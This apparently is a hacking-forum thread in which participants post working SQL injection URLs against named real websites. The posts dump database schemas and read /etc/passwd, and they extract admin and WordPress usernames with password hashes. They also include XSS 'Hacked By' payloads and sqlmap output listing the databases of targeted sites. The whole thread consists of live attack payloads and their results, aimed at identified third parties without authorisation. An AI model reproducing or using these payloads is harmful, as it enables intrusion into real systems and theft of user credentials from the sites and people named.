Haha, I spent half an hour getting the output to work. That's what a lack of practice does.
PHP: http://www.indoramaeleme.com/media.php?id=59+u%6eion select 1,2,c%6fnc%61t(0x223c2f7465%37%38%37%34%36%317265613e27273e3c73%36%33%37%326970743e616c6572742822,table%5f%6e%61%6de,0x3e3e,%63%6f%6c%75%6d%6e%5f%6e%61%6d%65,0x22293b3c2f7363726970743e),4,5,6,7,8+%20%66%72%6f%6d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%63%6f%6c%75%6d%6e%73%20%77%68%65%72%65%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29+--+-
Reading files via hex(load_file(file)); the output is naturally encoded. If anyone gets proper output, please share.
PHP: substring(load_file('/etc/passwd'),0,1)
So, I opened the docs and realized that the Russian version is missing 30% of what's there.
Abu Dhabi Cricket Club Code: http://www.adcricketclub.ae/news_detail.php?newsID=-123+union+select+1,concat(0x3a,user(),database()),3,4,5,6--
Malda College, India Code: http://www.maldacollege.ac.in/current-news.php?id=-35+union+select+1,version(),3,database()--
Code: view-source:http://bw-plast.com/en/news.php?id=-2+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14--
5.1.73-14.12-log
Code: http://www.severven.ru/base1/readmore.php?id=%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+--+
Code: http://www.severven.ru/base1/readmore.php?id=%27+union+all+select+1,2,3,4,5,(select+concat(@a,0x5B2F44554D505D)+from(select+@a:=0x5B44554D505D,(select+@a+from+information_schema.columns+where+table_schema=database()+and+@a:=concat(@a,table_name,0x09,column_name,0x0A)))a),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+--+
Spoiler: Result
Code: http://www.severven.ru/base1/readmore.php?id=%27+union+all+select+1,2,3,4,5,(select+concat_ws(0x09,username,password,salt,admin)from+users+limit+0,1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+--+
Code: administrator *the hash was here* 1
Code: http://www.severven.ru/robots.txt
PHP: Missing Controller
Error: Robots.txtController could not be found.
Error: Create the class Robots.txtController below in file: app/controllers/robots.txt_controller.php
<?php
class Robots.txtController extends AppController {
    var $name = 'Robots.txt';
}
?>
Notice: If you want to customize this error message, create app/views/errors/missing_controller.ctp
Code: view-source:http://mstream.fr/webtv/film.php?id=-1+union+select+1,2,@,4,5,6,7,8,9,10,11+from(select+@:=0x00,(select+@+from+wp_users+where+@:=concat(@,user_login,0x09,user_pass,0x0a)))q
Code: http://www.greenwall.org/recent-news.php?id=-22+union+select+1,2,version(),4,database(),6,7,8,9,10,11,12,13,14,15,16--
Code: http://www.so-toulouse.com/index.php?id=167&act=-68+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+--+
Code: http://mobile-phone-buy.ru/buy_mobile.php?pc=DOOGEE-T5%27+union+all+select+%27%3E%3Cscript%3Ealert("Hacked By extjs")%3C/script%3E%27--+
http://www.casuals.ru/product_info.php/products_id/11164'%20and%20extractvalue(0x00,concat(0x0a,(select%20table_name%20from%20information_schema.tables%20where%20table_name%20like%20'%25user%25'%20limit%203,1)))--%20/category/1
550 TIC
Code: http://www.landscrona.ru/tales/index.php?id=-111+union+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15,16+--+
30 TIC
Code: http://www.avon-beauty.ru/index.php?show_aux_page=(ExtractValue(1,concat(0x3a,(select(version())))))
60 TIC
Code: http://sejo.ru/index.php?page=119+union+select+1,2,3,4,@@version,6,7,8,9,10,11+--+1
At the bottom
Code: view-source:http://www.nesprosta.ru/?type=content&id=29'
HTML:
<!--SELECT * FROM structure WHERE id like '29''<br>Ошибка БД: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''29''' at line 1-->
<!--SELECT name,text FROM structure LEFT JOIN content ON structure.id=content.link_id WHERE structure.id=29'<br>Ошибка БД: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>База данных квартир: купить квартиру в Москве, снять квартиру (Москва), цены на квартиры, объявления недвижимость - Nesprosta.ru</title>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1251">
Code: http://www.trest14perm.ru/newbuildings/?show_id=37+and+1=10+uNion+all+select+1,2,3,4,5,6,7--
HTML:
SQL Error: The used SELECT statements have a different number of columns at /home/trest14prm/trest14perm.ru/docs/wbk-cms/module/objects.php line 47<br><pre>Array
(
    [code] => 1222
    [message] => The used SELECT statements have a different number of columns
    [query] => SELECT DISTINCT * FROM geocard,geomarks WHERE act=1 and geocard.type=geomarks.id and obj1=37 and 1=10 uNion all select 1,2,3,4,5,6,7-- GROUP BY type
    [context] => /home/trest14prm/trest14perm.ru/docs/wbk-cms/module/objects.php line 47
)
</pre>
Code: http://kras-city.ru/info_krsnr.php?num=1%27+union+all+select+1,2,3,4,5,6,7,8,9,10,(select(@)from(select(@:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat(@,0x3c6c693e,table_schema,0x2e,table_name,0x3a,column_name))))a),12--+[
How do I get around this?
Code: http://www.meatbranch.com/advert/magazine.html'+and+'1'='1
Code: http://www.teplopoint.ru/'--+[
Code: http://www.zorginox.ru/sobitiya/504/'%20and%20'1'='1
Code: http://an-tarusa.ru/View.aspx?id=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14
I still don't know what to do with this Jet Database.
АО «Сибирский реестр» Code: http://www.sibreg.ru/doc.php?id=-13827+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10--&menu=about
Clínica Medilaser Neiva Code: http://www.clinicamedilaser.com.co/branch.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5--
Code: http://www.kupa.pl/pl/humor.php?id=16
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=16 AND 1103=1103
    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=16 AND 7554=BENCHMARK(5000000,MD5(0x6673754b))
---
web application technology: Apache
back-end DBMS: MySQL <= 5.0.11
available databases [1]:
[*] baza777
available databases [15]:
[*] cursosoxford
[*] information_schema
[*] moodle
[*] mysql
[*] oxfordazuero2015
[*] oxfordazuero2016
[*] oxfordazuero2017
[*] oxforddavid2016
[*] oxforddavid2017
[*] oxfordsantiago2015
[*] oxfordsantiago2016
[*] oxfordsantiago2017
[*] performance_schema
[*] phpmyadmin
[*] temp
http://oxfordsantiago.com/index.php...ng_id=68&Itemid=650&establename=massmessaages
Code: http://adamslove.org/en-d.php?id=85 (GET)
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=85' AND 1057=1057 AND 'wZNL'='wZNL